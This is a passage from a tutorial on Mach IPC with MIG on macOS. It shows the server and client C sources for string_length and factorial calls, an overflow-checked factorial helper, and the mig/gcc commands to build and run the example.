kern_return_t 
factorial(mach_port_t server_port, xput_number_t num, xput_number_t *fac) { 
    if (!fac) 
        return KERN_INVALID_ADDRESS; 
 
    *fac = 1; 
    for (int i = 2; i <= num; i++) 
        *fac *= i; 
 
    return KERN_SUCCESS; 
} 
 
int main(void) { 
    kern_return_t kr; 
    mach_port_t server_port = MACH_PORT_NULL; // defined value for the error path below

    if ((kr = bootstrap_check_in(bootstrap_port, MIG_MISC_SERVICE, 
                                 &server_port)) != BOOTSTRAP_SUCCESS) { 
        mach_port_deallocate(mach_task_self(), server_port); 
        mach_error("bootstrap_check_in:", kr); 
        exit(1); 
    } 
    
    mach_msg_server(misc_server,            // call the server-interface module 
                    sizeof(msg_misc_t),     // maximum receive size 
                    server_port,            // port to receive on 
                    MACH_MSG_TIMEOUT_NONE); // options 
    return 0; 
}

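The server has a bit more to do:

At startup, the server registers the server port with bootstrap.
In addition, the server calls mach_msg_server, which makes the process loop forever handling Mach messages.
The first argument of mach_msg_server is the MIG-generated misc_server routine, which invokes the requested interface based on the incoming Mach message.
The server provides the actual implementations of the two interfaces. When the server receives a message from the client, these two functions are called from miscServer.c.
The server also implements the other functions that the MIG-generated code calls.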
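One caveat about the factorial implementation in server.c: the result is accumulated in an int, so with a 32-bit int anything above 12! overflows. A guarded variant might look like the sketch below. `demo_checked_factorial` is a hypothetical helper, it returns a plain int status rather than kern_return_t, and unlike the original loop it rejects negative input.

```c
#include <assert.h>
#include <limits.h>
#include <stddef.h>

/* Writes num! to *fac and returns 0, or returns -1 if num is negative
 * or the result would not fit in an int. */
static int demo_checked_factorial(int num, int *fac)
{
    assert(fac != NULL);
    if (num < 0)
        return -1;

    int result = 1;
    for (int i = 2; i <= num; i++) {
        if (result > INT_MAX / i)
            return -1;             /* result * i would overflow */
        result *= i;
    }
    *fac = result;
    return 0;
}
```

The check runs before each multiplication, so the function never performs a signed overflow, which is undefined behavior in C.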

e. Client

Client source:

// client.c 
 
#include "misc_types.h" 
 
#define INPUT_STRING "Hello, MIG!" 
#define INPUT_NUMBER 5 
 
int 
main(int argc, char **argv) 
{ 
    kern_return_t kr; 
    mach_port_t   server_port; 
    int           len, fac; 
 
    // look up the service to find the server's port 
    if ((kr = bootstrap_look_up(bootstrap_port, MIG_MISC_SERVICE, 
                                &server_port)) != BOOTSTRAP_SUCCESS) { 
        mach_error("bootstrap_look_up:", kr); 
        exit(1); 
    } 
 
    // call a procedure 
    if ((kr = string_length(server_port, INPUT_STRING, &len)) != KERN_SUCCESS) 
        mach_error("string_length:", kr); 
    else 
        printf("length of \"%s\" is %d\n", INPUT_STRING, len); 
 
    // call another procedure 
    if ((kr = factorial(server_port, INPUT_NUMBER, &fac)) != KERN_SUCCESS) 
        mach_error("factorial:", kr); 
    else 
        printf("factorial of %d is %d\n", INPUT_NUMBER, fac); 
 
    mach_port_deallocate(mach_task_self(), server_port); 
 
    exit(0); 
}

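The client source is short and does only two things:

It asks bootstrap for the server port registered by the server.
It calls string_length and factorial on the server port. Note that the first parameter of both functions is of type mach_port_t, and that both are implemented in miscUser.c.
Why are these two functions implemented in miscUser.c rather than in server.c?
Because the client is not responsible for the real implementation: the two same-named functions in miscUser.c ultimately send a request to the server over Mach IPC.

f. Build and run

Build and run with the following commands: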

# Terminal 1
mig -v misc.defs 
gcc -Wall -g -o server server.c miscServer.c 
gcc -Wall -g -o client client.c miscUser.c 
./server

# Terminal 2
./client

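How all the source files relate to each other: (figure omitted)

Output: (figure omitted)

The relationship between the client and the server: (figure omitted)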
